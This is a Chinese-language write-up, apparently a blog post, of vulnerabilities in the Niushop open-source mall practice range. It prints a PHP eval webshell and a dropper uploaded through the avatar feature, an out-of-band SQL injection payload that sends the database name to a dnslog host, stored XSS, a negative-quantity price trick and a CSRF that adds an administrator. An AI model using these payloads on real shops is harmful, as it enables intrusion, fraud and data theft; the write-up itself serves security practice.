niushop开源商城靶场漏洞

文件上传漏洞

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)

<?php @eval($_POST["cmd"]);?>

#生成h.php文件

<?php

fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');

?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

SQL注入漏洞

我们查看后台寻找功能点发现有一个地方可以执行 sql 命令

我们输入一个 sql 语句

发现没有回显,这时我们可以考虑使用外带注入

(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))

得到数据库的名字为 niushop_b2c

获取表名

XSS漏洞

后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作添加管理员链接

添加管理员用户

BP抓包;制作SCRF

复制下来制作链接

admin管理员在已登录的状态点击我们的链接

相关推荐
算家计算2 小时前
ComfyUI-v0.3.43本地部署教程:新增 Omnigen 2 支持,复杂图像任务一步到位!
人工智能·开源
三花AI2 小时前
不要错过学习老马团队 xAI 开源 Grok 全系列官方提示词
开源
海豚调度4 小时前
Linux 基金会报告解读:开源 AI 重塑经济格局,有人失业,有人涨薪!
大数据·人工智能·ai·开源
LucianaiB8 小时前
百度开源文心4.5系列开源21款模型,实测 ERNIE-4.5-VL-28B-A3B-Paddle 多项评测结果超 Qwen3-235B-A22B
百度·开源·文心大模型·paddle·gitcode
popeye0088 小时前
免费开源 RPA 软件困境与 tdRPA 的创新破局
开源·rpa
初九之潜龙勿用8 小时前
文心一言4.5开源模型测评:ERNIE-4.5-0.3B超轻量模型部署指南
开源·dubbo·文心一言
NetX行者8 小时前
FastMCP:用于构建MCP服务器的开源Python框架
服务器·python·开源
JuiceFS9 小时前
JuiceFS 社区版 V1.3 正式发布:支持 Python SDK、亿级备份加速、SQL 和 Windows 全面优化
开源·资讯
ajassi200012 小时前
开源 C# .net mvc 开发(八)IIS Express轻量化Web服务器的配置和使用
linux·开源·c#·mvc·.net
HelloGitHub12 小时前
从被喷“假开源”到登顶 GitHub 热榜,这个开源项目上演王者归来!
开源·github